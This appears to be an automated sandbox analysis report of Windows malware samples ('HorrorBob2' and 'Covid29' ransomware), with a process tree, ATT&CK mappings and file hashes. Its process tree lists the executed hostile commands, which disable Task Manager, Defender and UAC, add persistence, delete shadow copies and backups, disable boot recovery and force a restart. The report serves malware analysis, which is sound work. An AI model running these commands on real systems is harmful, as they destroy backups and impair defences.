PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Endermanch/MalwareDatabase
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb93079758,0x7ffb93079768,0x7ffb93079778
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:2
  2⤵
  PID:2164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:2416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2864 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4416 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4788 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4412 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:1732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:3196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4412 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5492 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5436 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5136 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:2908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3088 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2848 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:1
  2⤵
  PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:2392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=820 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4384 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:3236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4916 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4848 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:32
- C:\Users\Admin\Downloads\HorrorBob2.exe
  "C:\Users\Admin\Downloads\HorrorBob2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2B15.tmp\HorrorBob2.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2132
  - - C:\Windows\SysWOW64\cscript.exe
      cscript prompt.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:728
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
      4⤵
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      PID:4424
  - - C:\Windows\SysWOW64\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      System Location Discovery: System Language Discovery
      PID:2336
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1548
  - - C:\Windows\SysWOW64\reg.exe
      Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4356
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1636
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:4308
  - - C:\Windows\SysWOW64\net.exe
      net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1116
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r /t 00
      4⤵
      System Location Discovery: System Language Discovery
      PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1768,i,16370133384286160465,4043886043058265778,131072 /prefetch:8
  2⤵
  PID:4712

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3832

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2c8
1⤵
PID:4832

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:4076

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\mmsys.cpl ,
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\TrojanRansomCovid29.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:400
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\fakeerror.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 2
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3972
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:820
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4132
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5024
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3268
- - C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\mbr.exe
    mbr.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\Cov29Cry.exe
    Cov29Cry.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:336
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops desktop.ini file(s)
      Sets desktop wallpaper using registry
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      PID:3444
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
        5⤵
        
        PID:2744
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:4848
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        5⤵
        
        PID:3268
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:4792
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:4648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
        5⤵
        
        PID:4288
      - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        6⤵
        Deletes backup catalog
        
        PID:1604
    - - C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
        5⤵
        
        PID:1236
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4496
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 9
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2328
- - C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\Cov29LockScreen.exe
    Cov29LockScreen.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1368

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3984

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:3144

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2720

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4700

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aff055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

Filesize
212KB

MD5
2257803a7e34c3abd90ec6d41fd76a5a

SHA1
f7a32e6635d8513f74bd225f55d867ea56ae4803

SHA256
af23860fb3a448f2cc6107680078402555a345eb45bc5efb750f541fe5d7c174

SHA512
e9f4dc90d0829885f08879e868aa62041150b500f62682fc108da258eee26ad9509dcbf6e8a55f2d0bdba7aa9118dd149a70a7d851820d4ea683db7808c48540

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
10c4ca1d8d99fc2b270d1af8c84b89ce

SHA1
4dd12868359eaaee7f6aafa5e66185f88841cab9

SHA256
f1889979a7711be91bb7c2454e9de011e34bf5b232ed9717a2e3039230a6dbae

SHA512
64d84a044dc94431471101ad7d3f7ac7f40ef7d0fd6f9336029e56619f8039cbad905463d9349fb5b44241b1cf11716030d4d861d743d7af16126d9b529eac9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
1f7b6fc0871b90618e81b4ad6befc910

SHA1
30b68d3c49b2ebf1a2b291958657a3055057c999

SHA256
74841e4821e8eb552ba978475cf5f2a4dd59d599573cdccef79f8d7d4ba1b75f

SHA512
63910c7efd2ab8b8ac46509507e96fa5fba45328c2a25d12fae27a0adcdc71888ce9b3f3d9d96585463e4b66b56735b0c888580888b5bccda7e906aa35270837

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
8b621470b807b121e6cc8f98d6698e4c

SHA1
2e27398bd5ee4313644805e34ff0724ce7df56db

SHA256
570165b3b5b14c97e90bfd654e0b0ae22b5f4fefb5390472c22e3dbbdd8d164e

SHA512
2fb962c836456a5bf1c8147f3e83d29f1e60d8b419ce2aaa9752118d8f930f3bf789a558ae20b9e65e7522a441f7565d86c281ac9a1e22ea22b8dce46c257cd6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
7a7bb8284eaae507e075ace03e9c1cba

SHA1
ce48855dfb4b4067676e814709c8ea5af343ecc6

SHA256
a728c41a6df7c629257a665330d3ea84d1ee1c54762ed199020d2e6a9d719794

SHA512
9bdada79c4cb1e0c5ef92da7c4ddc4a594a5e7c70cf8d071eb25d5bc22be7c81122b79afde435de041c5c787cb5cee67e551f60afd7855263a56d61daeeb422a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
0afbe33041f49267e7ad7eca4a1f146c

SHA1
ee1b77be294d937a72ba556f3e58700915c9283c

SHA256
4bbcea74df010d42b336ae84719ca6096b63e1c44e3ef0e9cc5dbfedc183e80e

SHA512
b31d64e1c38c16924d61913ee31a0ee253c0b4463158f8c2622cf59295f376e7ff82e5a455aab17cc8c77100c7c72c8ac3c17c6c9cd551ad2c3fbe9ab1c2060c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a239f66c9947670c6fa11ddd36f5c8a3

SHA1
cd1deeb76c9d3ff32dd06a3be7980a9c6aa7e5c6

SHA256
306382f5d33b4a861ee211317c62db02ed02b3f903fddb3b0bcc1d957fd20adc

SHA512
94449c3b40f4e6e0d4f63da2a98e2c327857e7fd2a751a9aa8622172b7a41046acf7b0c85fe6cfeef595134058a5a22c37a9038bb45876b843cd3ba500f9d2e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
441f7208cd94d5272f612ff788914ed8

SHA1
67e62f2307c40a0718a78a11e7761632b9a1a426

SHA256
0da653b71cd7dba893a6cf5f18b501278b44b7fabb917636d5e67c4b76a5f522

SHA512
c0102e54edfa1d4caf9c64fb4ef5c23ac1dad9a2a971cceca97994bb16c3d70bf578da0f0168b6f1ef744dc9053b5c5823a116d422e3b8dada06be542a31e425

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
873B

MD5
63ffd7b143a66e2632332e8b914249e7

SHA1
a5056c31a4452785fdbcafd1d34df68d56a91c40

SHA256
d7065e175cad5d0c03f34ca3f4ac3822362f87e95f52a748ec9198ab8cb5bb61

SHA512
936df799faf13f7621c052f44569ba480588e46c71be4f639bebd89da29afc602e756c526eeebe05cd27fdfa685e65f0a9d2765d9a6e8597f9ef7459b195a583

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
d9b503e2b6a21832767cd998d09cbdff

SHA1
1dcc4273b086a6b6330ac9bc500830d5d7721b4d

SHA256
21190c12bdfecb55a7ad0dcba8b238a41bda655150b6779a80fb2004dc3518a0

SHA512
f6f27c384dbe757eb655cd017fa0ed85e628f90dc206bb63057cd04d99721824bf133fc00bf67ee882fcbebdab41e8b7c7939a0fa9f6697a1b092cb1f9737712

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
8245fb502d67be5716ea451dae1b5089

SHA1
214f85d314910c5dd93c2f5fa63bfd3cd205cede

SHA256
5c7c3c42dc76b93a2018750dbf1882f5a5f201636d27260a25be2105c2e6db1b

SHA512
904ea5071cc368d45e6835cccf4cb1d7da68b8ee840b9ab572552486b60c2ffab16d2843e24385396b547bcbfe8fa59ee3cb316818231870610d76d596069e94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
873B

MD5
2c0c3844902212f266e37af5aaedb8fe

SHA1
cead3540d46ab0d9a2ca14bf8a4bb8ad44d4bb34

